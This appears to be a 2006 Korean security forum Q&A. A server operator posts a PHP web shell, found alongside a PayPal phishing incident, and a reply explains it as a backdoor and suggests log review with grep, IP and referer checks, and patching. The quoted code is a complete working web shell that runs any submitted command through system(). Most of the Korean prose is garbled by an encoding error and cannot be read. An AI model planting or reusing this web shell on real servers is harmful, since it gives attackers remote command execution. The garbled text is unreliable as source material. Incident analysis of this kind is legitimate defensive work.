|
http://www.hackerschool.org/HS_Boards/zboard.php?desc=asc&no=217 [º¹»ç]
===============================================================================
>¿î¿µÇÏ°í ÀÖ´Â ¼¹ö¿¡
><?if(count($_GET)) extract($_GET);if(count($_POST)) extract($_POST);if(count($_SERVER)) extract($_SERVER);echo "<form action=$PHP_SELF method=post>command : <input type=text name=cmd><input type=submit></form><hr>";if($cmd){$cmd = str_replace("\\", "", $cmd);echo "<pre>"; system($cmd); echo "</pre>";}?>
>
>À§ ÄÚµå¿Í ÇÔ²² paypal ÇǽÌÀ» ´çÇÏ¿´½À´Ï´Ù.
>À§ÀÇ ÄÚµåÀÇ ºÐ¼®À» ÇÊ¿ä·Î ÇÕ´Ï´Ù.
>±×·³ ¸¹Àº Á¶¾ð ºÎŹµå¸³´Ï´Ù.. °¨»çÇÕ´Ï´Ù..
===============================================================================
ÇØ´ç ¼Ò½º ÄÚµå´Â backdoorÀÇ ÀÏÁ¾À¸·Î¼, °ø°ÝÀÚ°¡ Àü´ÞÇÑ ¹®ÀÚ¿À»
À¥ ¼¹ö ±ÇÇÑÀÇ ½© ¸í·ÉÀ¸·Î ½ÇÇàÇÏ´Â ¿ªÇÒÀ» ÇÕ´Ï´Ù.
À§ ¼Ò½º ÄÚµå Áß Çٽɸ¸ ³²±â¸é <? system($cmd); ?> °¡ µË´Ï´Ù.
$cmd º¯¼ö·Î Àü´ÞµÈ ¹®ÀÚ¿À» system ÇÔ¼ö·Î ½ÇÇàÇÑ´Ü ¸»ÀÔ´Ï´Ù.
´ëÀÀ ¹æ¾ÈÀ¸·Î½á..
¸ÕÀú, À§ ¼Ò½º ÄÚµåÀÇ ÆÄÀϸíÀ» À¥ ¼¹ö ·Î±×¿¡¼ °Ë»öÇØ º¸½Ã±â ¹Ù¶ø´Ï´Ù.
¿¹·Î, ¾ÆÆÄÄ¡¶ó¸é grep xxx.php /var/log/httpd/access_log °°Àº ¹æ¹ýÀ¸·Î
°Ë»öÇÏ½Ã¸é µË´Ï´Ù.
±×·³ ÀÌ ¹éµµ¾î ÆÄÀÏÀ» ¿äûÇÑ ·Î±×°¡ ³ª¿Ã °ÍÀÔ´Ï´Ù. (¸¸¾à °ø°ÝÀÚ°¡ ROOT
±ÇÇѱîÁö ȹµæÇÏ¿© ·Î±×¸¦ Áö¿ö¹ö·È´Ù¸é ³ª¿ÀÁö ¾ÊÀ» ¼öµµ ÀÖ½À´Ï´Ù.)
·Î±×°¡ ³ª¿Ô´Ù¸é IP¿Í REFERER ºÎºÐÀ» º¸°í °ø°ÝÀÚÀÇ Á¤º¸¸¦ ¾òÀ» ¼ö ÀÖÀ¸¸ç,
ÃÖÃÊ xxx.php°¡ ·Î±×¿¡ ³²Àº ½Ã°£À» ±âÁ¡À¸·Î ÁÖº¯ ·Î±×¸¦ ºÐ¼®ÇØ º¸½Ã¸é
°ø°ÝÀÚ°¡ ¾î¶² ¹æ¹ýÀ» ÀÌ¿ëÇؼ ¼¹ö¿¡ ħÅõÇß´ÂÁö ãÀ» ¼ö ÀÖÀ» °ÍÀÔ´Ï´Ù. (À¥ÇØÅ·À¸·Î ħÅõÇß´Ù°í °¡Á¤)
ÀÌ Á¤º¸¸¦ ±â¹ÝÀ¸·Î Ãë¾àÁ¡ ÆÐÄ¡¿Í °ø°ÝÀÚ¿¡ ´ëÇÑ ¹ýÀû ´ëÀÀÀ» ÇϽñ⠹ٶø´Ï´Ù.
|
Hit : 4171 Date : 2006/06/01 07:05
|
423, 
13/22 
¸Û¸Û
